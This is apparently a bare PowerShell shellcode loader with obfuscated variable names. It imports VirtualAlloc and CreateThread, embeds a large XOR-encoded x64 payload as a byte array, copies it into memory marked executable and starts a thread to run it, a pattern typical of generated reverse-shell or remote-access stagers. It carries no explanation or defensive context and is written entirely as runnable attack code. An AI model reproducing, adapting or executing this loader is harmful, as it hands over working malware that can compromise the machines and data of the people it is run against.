$STJmrUcG = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$XLFRsBuls = Add-Type -memberDefinition $STJmrUcG -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $dJdkFrlnWxXU = 0x48,0x31,0xc9,0x48,0x81,0xe9,0xb6,0xff,0xff,0xff,0x48,0x8d,0x5,0xef,0xff,0xff,0xff,0x48,0xbb,0xc8,0x39,0xda,0xed,0x8c,0x7c,0xf8,0x75,0x48,0x31,0x58,0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x80,0x8,0x13,0xa5,0xd,0x95,0x43,0x8a,0x37,0xc6,0x92,0x60,0x89,0x93,0x7,0x8a,0x37,0x71,0x61,0x81,0x1c,0x12,0x6b,0x5,0x55,0x30,0xf9,0xa5,0xbd,0x24,0xdf,0x3d,0xe5,0xc1,0x25,0x12,0x73,0x9e,0xc,0x51,0x69,0x9e,0x1,0x1c,0xf8,0xb5,0x24,0xe6,0xa7,0x1f,0xc4,0x98,0xfe,0x8a,0x24,0xe6,0x10,0xec,0xf4,0x34,0x4a,0x96,0x8f,0x5f,0x5a,0x2a,0x1,0xac,0x49,0x52,0x93,0x34,0xa0,0xa8,0xb6,0x62,0xf3,0x81,0x9a,0xf8,0x80,0x50,0xed,0x33,0xdf,0x8,0x66,0xb0,0x42,0xe5,0x5c,0x8b,0x41,0x59,0x30,0xf8,0x32,0x66,0x78,0x93,0x98,0x5a,0x6,0xf8,0x88,0xe6,0x5,0x93,0x98,0x5a,0x46,0xf8,0x88,0xc6,0x4d,0x93,0x1c,0xbf,0x2c,0xfa,0x4e,0x85,0xd4,0x93,0x22,0xc8,0xca,0x8c,0x62,0xc8,0x1f,0xf7,0x33,0x49,0xa7,0x79,0xe,0xf5,0x1c,0x1a,0xf1,0xe5,0x34,0xf1,0x52,0xfc,0x96,0x89,0x33,0x83,0x24,0x8c,0x4b,0xb5,0xcd,0xbd,0x92,0x70,0x7e,0xbb,0x1,0xbb,0x98,0xa9,0x13,0x8,0x66,0x3b,0x83,0x3c,0x1d,0xdb,0x13,0x40,0xe3,0x70,0x77,0xd3,0x55,0xda,0xc3,0x58,0xed,0xf8,0x1b,0xf0,0x96,0x9b,0x33,0x41,0x67,0x60,0xe0,0xe2,0x55,0x24,0xda,0x49,0xed,0x84,0x8b,0xfc,0x1c,0xd,0x5e,0x39,0xaf,0xf8,0x32,0x74,0xb1,0x9a,0xd2,0xc1,0x6b,0xf1,0x2,0x75,0x25,0x3b,0x66,0xf9,0x2a,0xb3,0x4f,0x90,0x15,0x9e,0x2a,0xd9,0x13,0x68,0x5b,0xf0,0x96,0x9b,0x37,0x41,0x67,0x60,0x65,0xf5,0x96,0xd7,0x5b,0x4c,0xed,0xf0,0x1f,0xfd,0x1c,0xb,0x52,0x83,0x62,0x38,0x4b,0xb5,0xcd,0x9a,0x4b,0x49,0x3e,0xee,0x5a,0xee,0x5c,0x83,0x52,0x51,0x27,0xea,0x4b,0x37,0xf1,0xfb,0x52,0x5a,0x99,0x50,0x5b,0xf5,0x44,0x81,0x5b,0x83,0x74,0x59,0x48,0x4b,0xe2,0x24,0x4e,0x41,0xd8,0xc7,0x70,0x86,0x42,0xe8,0x21,0x8,0x66,0xf1,0x55,0xfd,0x94,0x3d,0x5b,0x89,0x8a,0x10,0x2,0xb4,0x1d,0x92,0x9a,0xed,0x2f,0xc,0x1,0xb4,0xc,0x87,0x19,0x2,0x68,0xbd,0x42,0xe0,0x54,0x52,0xf7,0x44,0xef,0x41,0x42,0xe,0x51,0xac,0x35,0xf,0x99,0x65,0x4f,0x3d,0xf7,0xb3,0x12,0x9,0x66,0xb0,0x5a,0xf5,0xa7,0xf2,0x93,0x63,0x66,0x4f,0xd6,0xde,0x17,0x9a,0x4d,0x58,0x36,0xfd,0x32,0x7d,0x50,0xea,0xd3,0x40,0x99,0x70,0x4b,0x3d,0xdf,0x93,0xec,0xc8,0x2e,0x39,0xc2,0xf5,0xa7,0x31,0x1c,0xd7,0x86,0x4f,0xd6,0xfc,0x94,0x1c,0x79,0x18,0x27,0xe8,0x4f,0x3d,0xff,0x93,0x9a,0xf1,0x27,0xa,0x9a,0x11,0x69,0xba,0xec,0xdd,0xe3,0x70,0x77,0xbe,0x54,0x24,0xdd,0x7d,0x83,0x58,0x90,0xb4,0x1d,0xdb,0x5b,0x8b,0x8a,0xa0,0x4b,0x3d,0xff,0x96,0x22,0xc1,0xc,0xb4,0x42,0xec,0x55,0x52,0xea,0x49,0xdc,0xb2,0xda,0x7c,0x42,0x24,0xc6,0x8b,0x9e,0xb0,0x7d,0xe1,0x55,0x58,0xd7,0x28,0x38,0x39,0xf5,0xde,0x5d,0x9a,0x4a,0x60,0x66,0xa0,0x3,0xb4,0x5c,0x83,0x5b,0x81,0x94,0xf8,0x32,0x7d,0x5c,0x61,0x4b,0xac,0x35,0x55,0xfc,0x61,0x55,0x52,0xd0,0x41,0xef,0x77,0x4e,0x85,0xd4,0x92,0x9a,0xf8,0x2e,0x39,0xd9,0xfc,0x94,0x22,0x52,0xb2,0x64,0x69,0xcb,0xeb,0xe2,0xe,0x90,0xf0,0x66,0xcd,0x2b,0xec,0x5c,0x8c,0x4a,0x60,0x66,0xf0,0x3,0xb4,0x5c,0x83,0x79,0x8,0x3c,0xf1,0xb9,0xbf,0x32,0xd4,0x23,0xf7,0xb3,0xe7,0x5a,0xf5,0xa7,0xae,0x7d,0x45,0x7,0x4f,0xd6,0xfd,0xe2,0x15,0xfa,0x34,0x99,0x4f,0xfc,0xfc,0x1c,0x18,0x5b,0x21,0xa0,0xf8,0x86,0x42,0x68,0x6f,0x52,0xf7,0x81,0xe8,0x69,0xb4,0x44,0x92,0xd4,0xca,0x96,0x5,0xa1,0xe2,0xe2,0xe,0x13,0x8,0xdb,0x75


$hXaUGxSYNmCde = $XLFRsBuls::VirtualAlloc(0,[Math]::Max($dJdkFrlnWxXU.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($dJdkFrlnWxXU,0,$hXaUGxSYNmCde,$dJdkFrlnWxXU.Length)

$XLFRsBuls::CreateThread(0,0,$hXaUGxSYNmCde,0,0,0)
